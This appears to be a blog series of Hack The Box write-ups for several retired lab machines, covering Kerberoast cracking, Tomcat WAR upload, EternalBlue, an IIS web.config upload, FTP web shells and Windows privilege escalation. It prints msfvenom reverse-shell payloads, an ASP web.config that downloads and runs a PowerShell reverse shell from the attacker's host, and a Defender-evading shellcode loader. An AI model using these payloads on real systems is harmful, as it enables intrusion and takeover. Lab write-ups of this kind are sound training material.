614d997707b8a8bfa84db56b4277095fa25a0d309e726f39ce8abe6ebda96f2ccd0563fc64fdbe583abb1eee5611da8855ce857ba8490e3700bf894ef285ed6ddc51ac9fe2a33d919e9d2fecb33c339fce668db4c62a3225be525b4323af7d54898d3bc3257bcf7aca8d7007edd8bcb6c6b49ecf0ff0eb0e6e902ff738fa4f6a3266e37277794dd5f8af6dc54ea85f6fbc508bd6ac07a309c29599fd485e2fb42b01fd43da96307b689de4f58e4c6b4a37d202a6b6a0b897683c9ead74f11dc9910e0cfd524ff5cba7eb78a1e29d5ffa273b440837f82991b6a818399a336949cdbc7330c92912d3cfb93d08ca519a8ba45db4871b1d4dec73444187b0de23d0b55ab3374a5792e6ece543e2f08ce057dae78356fadc79ea1a1717473ec818d022c6d1d3816242b6c9c9aec6d2aa50a82e21cb1db893fc20fdfd95863a4bb6d7cc0d8e8c681fba98de5880ee3b902bb49f40b152639c4918b65262333149dcf477ee59ffbc0ab3d98a6cf35ad2023eeff90303b016d7aa616ed95262fa669ad7d2e6a2f6a527667ae4d5b517e3a6e61ee6dba22c6ddad1144d51888a368b086c3b2d0f07b4cdf95133e73a64d

Time to transfer this hash to my host machine and crack it with hashcat. It's like trying to guess someone's birthday based on their age:

hashcat.exe -m 13100 -o cracked.txt -a 0 hash.txt H:Cyber_Stuff\rockyou.txt

Cracked Administrator Password: Ticketmaster1968

"Ticketmaster1968"? Sounds like someone's favorite concert booking service and birth year. Security teams hate this one simple trick!

Exploring SMB Shares with Administrator Credentials

Now let's see what the boss has in their files:

smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968

Root Flag acquired! Mission accomplished:

469fef3243dc891ed7390a978bcfbc09

Getting System Shell

Let's get a proper shell to celebrate our victory:

impacket-psexec active.htb/administrator@10.10.10.100

And just like that, we're the kings of the Active Directory castle! Time to party like it's 1968! 🎉

HTB Machine Jerry May 2025

Tue, 20 May 2025 00:00:00 GMT

Scanning

Nmap

nmap -sC -sV -T5 -oA nmap/initials 10.10.10.95 -Pn

# Nmap 7.94SVN scan initiated Tue May 20 15:50:47 2025 as: nmap -sC -sV -T5 -oA nmap/initials -Pn 10.10.10.95
Nmap scan report for 10.10.10.95 (10.10.10.95)
Host is up (0.17s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 20 15:51:26 2025 -- 1 IP address (1 host up) scanned in 38.79 seconds

Found port 8080 open running Apache Tomcat 7.0.88 with Coyote JSP engine 1.1
Used -Pn flag to skip host discovery as the target might be blocking ICMP ping packets
The scan reveals this is a fairly isolated server with only the Tomcat service exposed
Apache Tomcat 7.0.88 is relatively outdated, suggesting potential vulnerabilities

Enumeration

Accessing the web server at http://10.10.10.95:8080 presents the default Tomcat welcome page:

The welcome page shows links to various Tomcat applications, including the Tomcat Manager
When attempting to access the Manager App, I'm prompted for authentication credentials
First tried basic credentials:
- Admin:Admin

This attempt resulted in "Access Denied" - but interestingly, the error page reveals valid credentials in plain text!
Hardcoded default credentials appear in the error message:
- tomcat:s3cret

Using these credentials successfully grants access to the Tomcat Manager interface at http://10.10.10.95:8080/manager/html

The Manager interface provides complete control over deployed applications and server status
This is a significant security weakness - administrative credentials should never be included in error messages

Using searchsploit to find known vulnerabilities for this Tomcat version:

Several vulnerabilities appear, including multiple paths for exploitation

Technical Analysis of CVE-2009-3548

The Apache Tomcat Manager application is vulnerable to CVE-2009-3548, which is a directory traversal vulnerability. This vulnerability specifically affects:
- Apache Tomcat versions 6.0.0 to 6.0.20
- Apache Tomcat versions 5.5.0 to 5.5.28
- Apache Tomcat versions 4.1.0 to 4.1.39
While our target is running Tomcat 7.0.88, it's still vulnerable to similar attack vectors because of how the Manager application handles WAR file deployments.

Attack Vector Details

Authentication Bypass: The vulnerability originally allowed attackers to bypass authentication by using directory traversal sequences (../) in URLs.
WAR File Deployment: In our case, we're using valid credentials, but exploiting the ability to deploy custom WAR (Web Application Archive) files.
Execution Flow:
- A WAR file contains a web application that can be deployed to a Java servlet container
- When deployed, Tomcat extracts and executes the contents
- If we include malicious JSP code in our WAR file, it will execute with Tomcat's privileges
- Since Tomcat is typically running as a privileged user, this allows for remote code execution
Modern Exploitation: While our target isn't vulnerable to the original CVE-2009-3548 directory traversal, the WAR file upload functionality presents a similar security risk that can be exploited through the Manager interface.

Exploitation using Metasploit

After confirming the vulnerability exists, I used Metasploit's tomcat_mgr_upload module:

use exploit/multi/http/tomcat_mgr_upload
set rhosts 10.10.10.95
set rport 8080
set lhost 10.10.16.2
set httpusername tomcat
set httppassword s3cret
exploit

This module:
1. Authenticates to the Tomcat Manager interface
2. Creates a malicious WAR file containing a JSP payload
3. Uploads and deploys the WAR file
4. Triggers the payload to establish a reverse shell

Success! The module worked perfectly and provided a Meterpreter shell
This demonstrates how dangerous exposed management interfaces can be, especially with default credentials

Manual Exploitation

While Metasploit makes this easy, understanding the manual process is valuable for learning
The Tomcat Manager interface provides a direct "WAR file to deploy" upload function:

First, I created a custom payload using msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.16.2 lport=1337 -f war -o shell2.war

This command:
1. Uses the java/jsp_shell_reverse_tcp payload - a JSP-based reverse shell
2. Sets my attacking machine as the callback destination
3. Formats the output as a WAR file
4. Names the output file shell2.war

After generating the payload, I uploaded it through the Manager interface
The WAR file appears in the application list after successful deployment:

A WAR file's context path (URL) is typically the filename without the .war extension
Starting a netcat listener to catch the reverse shell:

nc -lvnp 1337

Then triggering the payload by accessing the deployed application:

Success! The shell connects back with SYSTEM privileges
This demonstrates the severity of the vulnerability - direct command execution with the highest privilege level

Understanding the WAR Payload

The WAR file contains:
1. A deployment descriptor (WEB-INF/web.xml) that defines the application structure
2. JSP files that execute when accessed through the web server
3. In our case, embedded Java code that creates a reverse TCP connection
4. When executed, it runs with the same privileges as the Tomcat service (SYSTEM in this case)

Getting Flags

With SYSTEM-level access, retrieving both user and root flags is trivial:

lua

user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e

HTB Machine Blue May 2025

Sat, 17 May 2025 00:00:00 GMT

Scanning

Rustscan

rustscan -a 10.10.10.40 -r 1-65535 -b 100

Nmap Full Scan

nmap -sC -sV -T5 -oA nmap/initials 10.10.10.40 -Pn

# Nmap 7.94SVN scan initiated Sat May 17 16:32:23 2025 as: nmap -sC -sV -T5 -oA nmap/initials -Pn 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).
Not shown: 532 closed tcp ports (conn-refused), 460 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -18m21s, deviation: 34m34s, median: 1m35s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-05-17T12:07:01+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-05-17T11:06:58
|_  start_date: 2025-05-15T15:03:33
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 17 16:36:23 2025 -- 1 IP address (1 host up) scanned in 239.53 seconds

The scan reveals several open ports, with SMB (445) being the most interesting target.
The target is identified as Windows 7 Professional with Service Pack 1.
Several concerning security configurations are observed:
- SMB message signing is disabled (dangerous)
- Guest account is being used for authentication
- Authentication level is set to "user" rather than a more secure option
Given the Windows 7 operating system and SMB configuration, this machine may be vulnerable to known SMB exploits.

Enumeration

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-17 17:05 IST
Nmap scan report for 10.10.10.40
Host is up (0.37s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 5.76 seconds

Used Nmap's vulnerability scanning scripts to check for common SMB vulnerabilities.
The target is confirmed vulnerable to MS17-010, also known as EternalBlue.
This vulnerability allows for remote code execution with SYSTEM privileges on Windows systems.
EternalBlue is particularly dangerous because it requires no authentication and can provide direct system-level access.
The vulnerability was patched by Microsoft in March 2017, but many systems remain unpatched.

EternalBlue (MS17-010) Vulnerability Explained

EternalBlue exploits a vulnerability in SMBv1's handling of specially crafted packets, allowing attackers to send malicious SMB messages to execute arbitrary code. The flaw exists in how the SMB server handles certain requests, enabling buffer overflow in the Windows kernel.
This exploit became notorious as part of the WannaCry ransomware attack in 2017, affecting over 200,000 computers worldwide.
Despite being patched, many systems remain vulnerable due to delayed patching or legacy system requirements.

Exploitation

I used Metasploit for exploiting this vulnerability due to its reliability and ease of use.
The specific module used was exploit/windows/smb/ms17_010_eternalblue.
Configured the module with the target IP and appropriate payload settings.

Upon successful exploitation, gained immediate SYSTEM-level privileges.
This demonstrates the severity of the vulnerability - no user interaction required and immediate highest-level access obtained.
The exploitation process worked on the first attempt, indicating the target was highly vulnerable.
User Flag:

471a09faae9f0ade2aa13e768432be08

Root Flag

c04174bbf3de303ee031b55c3acf1d0d

HTB Machine Bounty May 2025

Sat, 17 May 2025 00:00:00 GMT

Scanning

Rustscan

rustscan -a 10.10.10.93 -r 1-1000 -b 100

Nmap

nmap -sC -sV -T5 -oA nmap/initials 10.10.10.93

# Nmap 7.94SVN scan initiated Sun May 18 14:03:44 2025 as: nmap -sC -sV -T5 -oA nmap/initials 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.21s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 18 14:09:00 2025 -- 1 IP address (1 host up) scanned in 316.39 seconds

Only port 80 is open with an IIS server.
The IIS Server version (7.5) is very old, suggesting potential exploits might exist.
The machine is likely running Windows based on the service information.

Enumeration

I performed directory discovery using ffuf and found a directory called uploadedfiles but encountered a 403 Access Denied error. This prompted me to search for bypass techniques.

ffuf -u http://10.10.10.93/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 150

I discovered that there's an exploit for older versions of IIS that might help bypass access restrictions.

Reference: https://www.exploit-db.com/exploits/19033

Title: Microsoft IIS 7.5 Classic ASP Authentication Bypass

Affected Software:
Microsoft IIS 7.5 with configured Classic ASP and .NET Framework 4.0
installed (.NET Framework 2.0 is unaffected, other .NET frameworks
have not been tested)
(tested on Windows 7)

Details:
By appending ":$i30:$INDEX_ALLOCATION" to the directory serving the
classic ASP file access restrictions can be successfully bypassed.

Take this Example:
1.) Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files)
2.) There is a password protected directory configured that has
administrative asp scripts inside
3.) An attacker requests the directory with :$i30:$INDEX_ALLOCATION
appended to the directory name
4.) IIS/7.5 gracefully executes the ASP script without asking for
proper credentials

According to the exploit documentation, I needed to append :$i30:$INDEX_ALLOCATION to the URL, like this:

http://10.10.10.93/uploadedfiles:$i30:$INDEX_ALLOCATION

I tried to exploit this, but it failed because the prerequisite "password protected directory with administrative asp scripts" wasn't present in our target.
After attempting several other exploits without success, I checked for HTTP version vulnerabilities like MS15-034 (CVE-2015-1635).

python CVE-2015-1635-POC.py -t 10.10.10.93

Surprise! This whole path turned out to be a rabbit hole! 🐰
I had been following a writeup that went down this same unfruitful path, and I confidently followed along. 😗
My Reaction is Like,

The actual vulnerability was much simpler - there's an ASPX page called transfer.aspx that allows file uploads.
Unfortunately, my directory discovery tools missed this file despite trying different wordlists and techniques. 😒

Solution Explanation

After watching the legendary ippsec's video on this box (https://www.youtube.com/watch?v=7ur4om1K98Y), I tried running gobuster with a different wordlist:
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
This time, I successfully found transfer.aspx.
When I tried to upload a text file, it returned "invalid file":

This meant I needed to discover which file extensions were permitted. While Burp Suite's Intruder could be used, it would be painfully slow for this task, so I opted for ffuf instead.
The command for extension bruteforcing:

ffuf -request fuzz.req -w /mnt/hgfs/SecLists-master/Discovery/Web-Content/raft-small-extensions.txt -request-proto http

Here's the request file used (fuzz.req):

POST /transfer.aspx HTTP/1.1
Host: 10.10.10.93
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------422437140139749595703497098572
Content-Length: 773
Origin: http://10.10.10.93
Connection: keep-alive
Referer: http://10.10.10.93/transfer.aspx
Upgrade-Insecure-Requests: 1

-----------------------------422437140139749595703497098572
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUKMTI3ODM5MzQ0Mg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkXqaYmgX5i81h7QT7amTjI+lGMRI=
-----------------------------422437140139749595703497098572
Content-Disposition: form-data; name="__EVENTVALIDATION"

/wEWAgLNoKyFBwLt3oXMAxGQeqvPUDSNlGq1wHsrnYpxYT5S
-----------------------------422437140139749595703497098572
Content-Disposition: form-data; name="FileUpload1"; filename="targetsFUZZ"
Content-Type: text/plain

192.168.65.134
192.168.65.135

-----------------------------422437140139749595703497098572
Content-Disposition: form-data; name="btnUpload"

Upload
-----------------------------422437140139749595703497098572--

By analyzing the response sizes, I was able to filter out these three interesting file extensions:

.config <== (Most promising)
.jpeg
.doc

Success! The file with .config extension was uploaded:

Exploitation

For this exploitation technique, I first tested with a simple ICMP callback using ping to verify command execution.
Here's the malicious web.config file:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.16.10")
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>
-->

How this works:
- The config file reconfigures the IIS server to process .config files using ASP
- The ASP code embedded in HTML comments executes system commands
- The server processes this file and runs our commands with the server's privileges

For a proper reverse shell, I used Nishang's Invoke-PowerShellTcp.ps1 with an added command at the end:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.10 -Port 1337

Modified web.config to download and execute the PowerShell script:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.16.10/Invoke-PowerShellTcp.ps1')")
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>
-->

After uploading the file and accessing it, I successfully received a shell connection!

User Flag:

67eea4d3b99884133851d163f65ea35b

Post Exploitation

After checking permissions with whoami /priv, I discovered that SeImpersonatePrivilege was enabled. This is perfect for using the Juicy Potato privilege escalation technique.

What is SeImpersonatePrivilege?

SeImpersonatePrivilege allows a process to impersonate the security context of another user.
It's normally used by services to impersonate clients (e.g., when a web server impersonates a logged-in user).
If you can coerce a privileged token (e.g., SYSTEM) to authenticate to your service and you can impersonate it, you can escalate to SYSTEM privileges.
This privilege is a common path to privilege escalation on Windows servers.

Gaining SYSTEM Shell with Juicy Potato

First, I uploaded the Juicy Potato executable as jp.exe:

Next, I generated a reverse shell payload using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=1337 -f exe -o reverse.exe

Then uploaded this reverse shell executable:

Finally, I executed Juicy Potato with the following command to trigger my reverse shell as NT AUTHORITY\SYSTEM:

jp.exe -l 1337 -t * -p reverse.exe

How Juicy Potato works:
- It abuses the SeImpersonatePrivilege to create a COM server and forces Windows to authenticate to it
- It then captures and impersonates that high-privilege token
- Finally, it launches our payload with those elevated privileges

Success! I obtained the root flag:

a548f17dc9a5f08ddf23aed3c152d834

HTB Machine Deval May 2025

Fri, 16 May 2025 00:00:00 GMT

Scanning

Rustscan

Ports Scan using rustscan

_______________________________________                                                      
 http://discord.skerritt.blog         :                                                      
 https://github.com/RustScan/RustScan :                                                      
--------------------------------------                                                       
Scanning ports faster than you can say 'SYN ACK'                                                                    
~] The config file is expected to be at "/home/kali/.rustscan.toml"                          
~] File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.  

open 10.10.10.5:21
open 10.10.10.5:80

Nmap

nmap -sC -sV -T5 -A -p21,80 -oA nmap/initials 10.10.10.5

# Nmap 7.94SVN scan initiated Fri May 16 01:17:17 2025 as: nmap -sC -sV -T5 -A -p21,80 -oA nmap/initials 10.10.10.5
Nmap scan report for 10.10.10.5 (10.10.10.5)
Host is up (0.16s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 16 01:17:37 2025 -- 1 IP address (1 host up) scanned in 20.13 seconds

Based on the scan results, only IIS Web Server and FTP services are running on the target, with no other open ports detected.
The target is running Windows with Microsoft IIS 7.5 web server.
FTP is running on port 21 with anonymous login enabled.
HTTP is running on port 80 serving a default IIS 7.5 page.

Enumeration

FTP is accessible using simple credentials: user:anonymous and password:<blank> login.

Downloaded all available files using the following commands to analyze their contents:

wget -r -l 10 --ftp-user='anonymous' --ftp-password='' ftp://10.10.10.5/aspnet_client/*  

wget -r -l 10 --ftp-user='anonymous' --ftp-password='' ftp://10.10.10.5/iisstart.htm 

wget -r -l 10 --ftp-user='anonymous' --ftp-password='' ftp://10.10.10.5/welcome.png

Initial analysis revealed no immediately useful information from these files.
Performed directory brute forcing with multiple tools and wordlists:

# Used multiple wordlists for thorough enumeration
https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Web-Content/Web-Servers/IIS.txt

/usr/share/dirb/wordlists/common.txt

/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Directory brute forcing yielded no additional interesting directories or files.
Critical discovery: FTP upload directory appears to be the same as the web root directory. This means files uploaded via FTP would be accessible through the web server.
This configuration presents a significant vulnerability as we can upload an ASP.NET web shell through FTP and then execute it via the web server.

Exploitation

Successfully confirmed access via basic web shell.
For improved post-exploitation capabilities, generated a Meterpreter shell using:

Metasploit Stuff

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.16.10 LPORT=1337 \
  -f aspx \
  -o msf_shell.aspx

Transferred the payload to the victim machine via FTP.
Set up a Metasploit handler to receive the incoming connection.
Triggered the payload by accessing it through the web server.

Post Exploitation

Again Metasploit Stuff

Used the exploit suggester module to identify potential privilege escalation vectors:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Selected the MS10-015 (KiTrap0d) privilege escalation exploit:

use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set lhost 10.10.16.10
run

MS10-015 (KiTrap0d) Vulnerability Background: MS10-015/CVE-2010-0232 exploits a kernel vulnerability in Windows' Virtual DOS Machine subsystem that improperly handles 16-bit system calls, allowing manipulation of kernel-mode memory. The flaw exists in win32k.sys where the kernel mishandles exceptions during system call processing, enabling attackers to execute arbitrary code with SYSTEM privileges by triggering a controlled exception that corrupts kernel stack pointers. This vulnerability affects multiple Windows versions including Windows 7, which explains its effectiveness on the Devel machine.
More On This...............

Successfully escalated privileges to NT AUTHORITY\SYSTEM, giving complete control over the target system.

Located and retrieved both user and root flags:

User Flag:

d356b7b47e9b90cfd11c33d16bcc30d8

Root Flag:

1db38188c79211dbcbf76001749afe01

HTB Machine Optimum May 2025

Fri, 16 May 2025 00:00:00 GMT

Scanning

Rustscan

rustscan -a 10.10.10.8 -r 1-1000 -b 100

Nmap

# Nmap 7.94SVN scan initiated Fri May 16 15:10:08 2025 as: nmap -sC -sV -T5 -oA nmap/initials 10.10.10.8
Nmap scan report for 10.10.10.8 (10.10.10.8)
Host is up (0.18s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 16 15:10:38 2025 -- 1 IP address (1 host up) scanned in 29.60 seconds

The scan reveals only one open port: 80 (HTTP) running HttpFileServer (HFS) version 2.3.
The target is confirmed to be a Windows machine.
RustScan was used first for quick port discovery, followed by a detailed Nmap scan to identify services and versions.
HFS (HTTP File Server) is a free web server specifically designed for file sharing, often used for quick setup without complex configuration.

Enumeration

After identifying the web application as HFS 2.3, I conducted research to find potential vulnerabilities.
The application version information was clearly visible in the HTTP headers and page title.
A search for exploits revealed multiple available options for this specific version.
HFS 2.3 is known to have several critical vulnerabilities, including remote code execution issues through the search function and macro functionality.

Searching Exploits Online

Found a suitable exploit on GitHub: https://github.com/thepedroalves/HFS-2.3-RCE-Exploit
This exploit leverages a remote code execution vulnerability in HFS 2.3.
The vulnerability exists because HFS fails to properly sanitize user input in search queries, allowing for command injection.
This particular version (2.3) was released in 2014 and has not received security updates to patch these vulnerabilities.

Exploitation

Initial Foot Hold

The exploit was executed successfully against the target.
This provided an initial user-level shell on the system.
The exploit works by sending a specially crafted HTTP request that contains a command injection payload.
When the server processes this request, it executes our commands with the privileges of the user running the HFS service.

Initial reconnaissance showed the user context was "kostas", a standard user account on the system.
The shell provides limited access but sufficient to begin internal enumeration and locate the user flag.
User flag successfully retrieved:

ca03a3a501d204b062958bfa014f9e9f

Now for post exploitation we need Metasploit's meterpreter shell so i have used this,
Payload Creation

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 LPORT=4444 -f exe -o reverse.exe

Payload Delivery

python -m http.server 8000

Payload Download in Victim Machine:

Invoke-WebRequest -Uri "http://10.10.16.10:8000/reverse.exe" -OutFile "reverse.exe"

Post Exploitation

Metasploit Post Exploitation Module

For privilege escalation, utilized Metasploit's local exploit suggester module to identify potential vectors.
The module scans the target system for applicable vulnerabilities based on its configuration.
This automated tool checks for missing patches, vulnerable services, and other common privilege escalation paths without manual enumeration.

use post/multi/recon/local_exploit_suggester 
set SESSION 5
run

Privilege Escalation

While investigating the suggester results, performed additional research online for suitable Windows privilege escalation exploits.
Identified MS16-032 (Secondary Logon Handle) privilege escalation vulnerability as a promising candidate.
This vulnerability affects multiple Windows versions and has reliable public exploits available.
The exploit targets a flaw in the Windows Secondary Logon Service that allows a standard user to elevate privileges to SYSTEM.

MS16-032 Vulnerability Background

MS16-032 (CVE-2016-0099) is a privilege escalation vulnerability in the Windows Secondary Logon Service.
The vulnerability exists due to improper handling of security impersonation tokens in the Secondary Logon Service.
When exploited, it allows a standard user to elevate privileges to SYSTEM by triggering a race condition in the handling of these tokens.
Microsoft patched this vulnerability in March 2016, but many systems remain unpatched and vulnerable.
This vulnerability is particularly effective because it works on multiple Windows versions (Windows 7-10, Server 2008-2012 R2) and has high reliability.
Used the corresponding Metasploit module to exploit the vulnerability:

use windows/local/ms16_032_secondary_logon_handle_privesc
set session 5
set lhost 10.10.16.10
set lport 4545
run

Privilege escalation was successful, providing SYSTEM-level access to the target.
SYSTEM privileges represent the highest level of access on a Windows machine, equivalent to root access on Linux systems.
With these elevated privileges, full control of the system was achieved, allowing access to all files and configuration settings.

Root flag successfully retrieved:

8a532739186a7fb45ef0f03dec9b85fe

HTB Machine Arctic May 2025

Thu, 15 May 2025 00:00:00 GMT

Scanning

Nmap

Ports Open

Discovered open port 135/tcp on 10.10.10.11 (Remote Procedure Call (RPC))
Discovered open port 8500/tcp on 10.10.10.11 # Don't know what it is
Discovered open port 49154/tcp on 10.10.10.11 (Remote Procedure Call (RPC))

Full Scan

# Nmap 7.94SVN scan initiated Wed May 14 15:27:15 2025 as: nmap -sC -sV -vvv -T5 -oA nmap/initials -Pn 10.10.10.11
Nmap scan report for 10.10.10.11 (10.10.10.11)
Host is up, received user-set (0.19s latency).
Scanned at 2025-05-14 15:27:16 IST for 170s
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE REASON  VERSION
135/tcp   open  msrpc   syn-ack Microsoft Windows RPC
8500/tcp  open  fmtp?   syn-ack
49154/tcp open  msrpc   syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 14 15:30:06 2025 -- 1 IP address (1 host up) scanned in 171.15 seconds

Enumeration

Web Server (Adobe ColdFusion web server)

Adobe ColdFusion 8 Login Panel

Exploitation

Metasploit Stuff

Trying 1st Payload using Metasploit

But Failed!!!!!!!!!!!
Started Debugging Using Burp with Proxy and found one problem: Metasploit only waits for 5 sec and then it gives error and shuts the listener, but this exploit takes 20 to 30 sec for getting shell. So we have to forward the POST request to proxy and take it into repeater, then shut the Metasploit listener off and start a netcat listener with the same port and send the request through repeater. Then we got the shell.

Now the problem is that I have a normal user/service shell which is kind of primitive in nature and we need a meterpreter shell. So for that, we use msfconsole to create another PowerShell payload which will be invoked from the shell we got.
After Creating that, we transport it to the victim machine using a Python HTTP server and invoke it directly in memory without leaving a file on disk.
This is not that easy because Defender keeps removing it, so this is just the success part, although you can see the number of attempts. 😗
Creating Shell.ps1

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 LPORT=1337 -f psh -o shell.ps1

Payload: shell.ps1

$xVgZtpUmbJgsKj = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$JoDMBHBRFCPbBq = Add-Type -memberDefinition $xVgZtpUmbJgsKj -Name "Win32" -namespace Win32Functions -passthru

